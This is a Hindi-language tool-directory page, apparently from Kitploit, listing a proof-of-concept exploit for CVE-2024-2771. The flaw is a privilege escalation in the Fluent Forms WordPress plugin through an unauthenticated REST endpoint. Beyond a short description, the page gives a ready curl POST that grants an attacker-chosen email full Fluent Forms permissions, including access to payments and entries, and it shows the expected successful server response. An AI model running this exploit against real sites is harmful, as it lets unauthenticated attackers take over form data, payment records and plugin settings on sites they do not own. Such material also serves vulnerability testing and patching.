Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-2771-PoC — CVE-2024-2771 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Fluent Forms WordPress प्लगइन में एक विशेषाधिकार वृद्धि भेद्यता जो एक अनधिकृत REST API एंडपॉइंट के माध्यम से है। | Kitploit
उपकरण/GitHubGitHub/whale93/cve-2024-2771-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubwhale93/cve-2024-2771-poc

CVE-2024-2771-PoC

CVE-2024-2771 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Fluent Forms WordPress प्लगइन में एक विशेषाधिकार वृद्धि भेद्यता जो एक अनधिकृत REST API एंडपॉइंट के माध्यम से है।

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-2771-PoC

CVE-2024-2771 प्रमाण-अवधारणा

क्विज़, सर्वेक्षण और ड्रैग एंड ड्रॉप WP फॉर्म बिल्डर प्लगइन के लिए फ्लुएंट फॉर्म्स द्वारा कॉन्टैक्ट फॉर्म प्लगइन, वर्डप्रेस में संस्करण 5.1.16 तक (और इसमें शामिल) सभी संस्करणों में /wp-json/fluentform/v1/managers REST API एंडपॉइंट पर क्षमता जांच की कमी के कारण विशेषाधिकार वृद्धि के लिए कमजोर है। इससे अनप्रमाणित हमलावरों के लिए फ्लुएंट फॉर्म प्रबंधन अनुमतियों वाले उपयोगकर्ताओं को अनुदान देना संभव हो जाता है, जो उन्हें प्लगइन की सभी सेटिंग्स और सुविधाओं तक पहुंच प्रदान करता है। यह अनप्रमाणित हमलावरों के लिए प्रबंधक खातों को हटाना भी संभव बनाता है।

पूर्वापेक्षाएँ

  • कॉन्टैक्ट फॉर्म – फ्लुएंट फॉर्म्स ≤ 5.1.16 सक्रिय के साथ वर्डप्रेस साइट।
  • हमलावर साइट के REST API तक पहुंच सकता है (कोई प्रमाणीकरण आवश्यक नहीं)।

एक्सप्लॉइट कमांड

# 1. Grant full Fluent Forms permissions to an arbitrary email
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
     -H "Content-Type: application/json" \
     -d '{
           "manager": {
             "email": "[email protected]",
             "permissions": [
               "fluentform_dashboard_access",
               "fluentform_forms_manager",
               "fluentform_entries_viewer",
               "fluentform_manage_entries",
               "fluentform_view_payments",
               "fluentform_manage_payments",
               "fluentform_settings_manager",
               "fluentform_full_access"
             ]
           }
         }'

अपेक्षित प्रतिक्रिया

HTTP/1.1 200 OK
{
  "message": "Manager has been saved.",
  "manager": {
    "id": 2,
    "email": "[email protected]",
    "permissions": [
      "fluentform_dashboard_access",
      "fluentform_forms_manager",
      "fluentform_entries_viewer",
      "fluentform_manage_entries",
      "fluentform_view_payments",
      "fluentform_manage_payments",
      "fluentform_settings_manager",
      "fluentform_full_access"
    ]
  }
}

स्क्रीनशॉट स्क्रीनशॉट 2025-08-01 105801

टूल डाउनलोड करें